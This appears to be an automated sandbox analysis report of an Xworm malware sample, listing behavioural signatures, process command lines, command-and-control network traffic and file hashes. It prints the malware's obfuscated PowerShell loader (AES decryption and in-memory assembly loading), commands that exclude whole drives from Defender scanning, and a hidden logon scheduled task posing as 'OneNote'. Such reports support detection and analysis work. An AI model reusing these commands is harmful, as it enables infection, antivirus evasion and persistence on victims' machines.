memory/2148-12-0x000007FEF5AA0000-0x000007FEF643D000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-11 23:33
Reported
2024-06-11 23:36
Platform
win10v2004-20240611-en
Max time kernel
146s
Max time network
152s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\F30585602117611871915843120891316949139984')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\SC3.cmd"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\SC3.cmd';$QVHA='CfvRoopfvRoyTfvRoofvRo'.Replace('fvRo', ''),'MakCkDinkCkDMkCkDodkCkDulekCkD'.Replace('kCkD', ''),'GejDtwtCujDtwrrjDtwenjDtwtPjDtwrojDtwcesjDtwsjDtw'.Replace('jDtw', ''),'CrJoSTeJoSTatJoSTeDJoSTeJoSTcJoSTryJoSTpJoSTtoJoSTrJoST'.Replace('JoST', ''),'STPOBpTPOBliTPOBtTPOB'.Replace('TPOB', ''),'DyvWFecyvWFomyvWFpreyvWFsyvWFsyvWF'.Replace('yvWF', ''),'ChaPahEngePahEEPahExtePahEnPahEsioPahEnPahE'.Replace('PahE', ''),'ElePJDLmePJDLntPJDLAPJDLtPJDL'.Replace('PJDL', ''),'EntADZAryADZAPoADZAinADZAtADZA'.Replace('ADZA', ''),'TralECtnslECtflECtolECtrmlECtFilECtnalECtlBlECtlolECtcklECt'.Replace('lECt', ''),'FmBZfrmBZfommBZfBmBZfamBZfsemBZf64SmBZftrmBZfinmBZfgmBZf'.Replace('mBZf', ''),'ReNkCJadNkCJLiNkCJnesNkCJ'.Replace('NkCJ', ''),'InIpSVvoIpSVkeIpSV'.Replace('IpSV', ''),'LSLFPoaSLFPdSLFP'.Replace('SLFP', '');powershell -w hidden;function XEpjb($SsIUN){$RwiqM=[System.Security.Cryptography.Aes]::Create();$RwiqM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$RwiqM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$RwiqM.Key=[System.Convert]::($QVHA[10])('S3B4J2w42TOnytzqhDJwxtrTIKtriJl/AzoEsA6j1cQ=');$RwiqM.IV=[System.Convert]::($QVHA[10])('0ieVmLktmIvfx4l5/K4RAw==');$wFkLg=$RwiqM.($QVHA[3])();$CJXNR=$wFkLg.($QVHA[9])($SsIUN,0,$SsIUN.Length);$wFkLg.Dispose();$RwiqM.Dispose();$CJXNR;}function ZqMTM($SsIUN){$SbGLz=New-Object System.IO.MemoryStream(,$SsIUN);$qsYcG=New-Object System.IO.MemoryStream;$dzWih=New-Object System.IO.Compression.GZipStream($SbGLz,[IO.Compression.CompressionMode]::($QVHA[5]));$dzWih.($QVHA[0])($qsYcG);$dzWih.Dispose();$SbGLz.Dispose();$qsYcG.Dispose();$qsYcG.ToArray();}$gBYoC=[System.IO.File]::($QVHA[11])([Console]::Title);$nEynS=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 5).Substring(2))));$FPzIN=ZqMTM (XEpjb ([Convert]::($QVHA[10])([System.Linq.Enumerable]::($QVHA[7])($gBYoC, 6).Substring(2))));[System.Reflection.Assembly]::($QVHA[13])([byte[]]$FPzIN).($QVHA[8]).($QVHA[12])($null,$null);[System.Reflection.Assembly]::($QVHA[13])([byte[]]$nEynS).($QVHA[8]).($QVHA[12])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\SC3')
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 8009' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC3.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| CO | 186.169.73.205:7772 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | tcp |
| US | 8.8.8.8:53 | 205.73.169.186.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ivmsgauzt84tgksuw6an6cht0am8iiux0jz.duckdns.org | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
Files
memory/4572-0-0x00007FFFD3F33000-0x00007FFFD3F35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_sh0gibcp.kay.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4572-7-0x000001611B8D0000-0x000001611B8F2000-memory.dmp
memory/4572-11-0x00007FFFD3F30000-0x00007FFFD49F1000-memory.dmp
memory/4572-12-0x00007FFFD3F30000-0x00007FFFD49F1000-memory.dmp
memory/4572-13-0x0000016136300000-0x0000016136344000-memory.dmp
memory/4572-14-0x00000161363D0000-0x0000016136446000-memory.dmp
memory/1840-15-0x00007FFFD3F30000-0x00007FFFD49F1000-memory.dmp
memory/1840-25-0x00007FFFD3F30000-0x00007FFFD49F1000-memory.dmp
memory/1840-26-0x00007FFFD3F30000-0x00007FFFD49F1000-memory.dmp
memory/1840-28-0x00007FFFD3F30000-0x00007FFFD49F1000-memory.dmp
memory/4572-29-0x0000016135F80000-0x0000016135F92000-memory.dmp
memory/4572-31-0x00007FFFF1190000-0x00007FFFF124E000-memory.dmp
memory/4572-30-0x00007FFFF25B0000-0x00007FFFF27A5000-memory.dmp
memory/4572-32-0x0000016135F90000-0x0000016135FB0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8cfdd430773e30dfb63ed9de3ba5a2a6 |
| SHA1 | e7455b94f641e068089ae1e75264f38f49d569af |
| SHA256 | b86d3b554d259cb4c2ba391c7e91840db57a9a0d4ffd54b6e1b200f344374353 |
| SHA512 | 095fc7867aff19f262ad3ae40712f2012be0f11a03111a7e8784dfdfa74280c56ac257ba46fd72a447d3eae9835d268e5d883880bdbc4509075cb8b1f663dc45 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | e4de99c1795fd54aa87da05fa39c199c |
| SHA1 | dfaaac2de1490fae01104f0a6853a9d8fe39a9d7 |
| SHA256 | 23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457 |
| SHA512 | 796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926 |
C:\Users\Admin\AppData\Roaming\SC3.cmd
| MD5 | aebbb92d1f67cddf37f996695175153e |
| SHA1 | 8706b8f0d37fb05aa70f32d78c3d8469b64c7c27 |
| SHA256 | 2ad358d7ccdb651d4603cb591a2eb19416ed453a8cf19c82cb2717477db518a7 |
| SHA512 | 60e261b245fb23c75cd7fc0e507daa3e6f39f7f86261622ca90fd21dafda481abd0d80d7befe01ebe31a3f25485df298445662dfb8041fa0e607c85c31425ce6 |
memory/404-89-0x00000235F6390000-0x00000235F63A2000-memory.dmp
memory/404-90-0x00007FFFF25B0000-0x00007FFFF27A5000-memory.dmp
memory/404-91-0x00007FFFF1190000-0x00007FFFF124E000-memory.dmp
memory/4572-92-0x00007FFFD3F30000-0x00007FFFD49F1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3dce19ecdd160f6404640096e42f78d8 |
| SHA1 | 1de523276924b703a80edf61ca63b602e8def64a |
| SHA256 | a3be9b1ae4d07c1977ef244909e08b80ad29b98d261c5e750e0c84e2d4f82883 |
| SHA512 | 6d641804c7945423f26b31130082f3fdb6ba79d3b12b3fdd85d1f058de1b0deab2e0b2abff113145f5d8a4fd88b692d897ab237dfceaa18243329a2b800874b6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 77d622bb1a5b250869a3238b9bc1402b |
| SHA1 | d47f4003c2554b9dfc4c16f22460b331886b191b |
| SHA256 | f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb |
| SHA512 | d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 410142fcf54278e9a6808d8deca7452c |
| SHA1 | 4136e390b6ec038332d663d6abe42bbc8ccd7ae6 |
| SHA256 | 040f302866c5636391c4212ff54bcfcc20c386716795924f7b00af56b33ddf54 |
| SHA512 | bd3ffce2e24cef867f157bf90a1271e4c3ec56b597c9eea6161279d6ecb9c193458c9c509d1ca4e60d6b4ca451a5879e2628f63aaaccfd169a7e9dba4ee7d12a |
memory/404-126-0x00000235F6C10000-0x00000235F6C20000-memory.dmp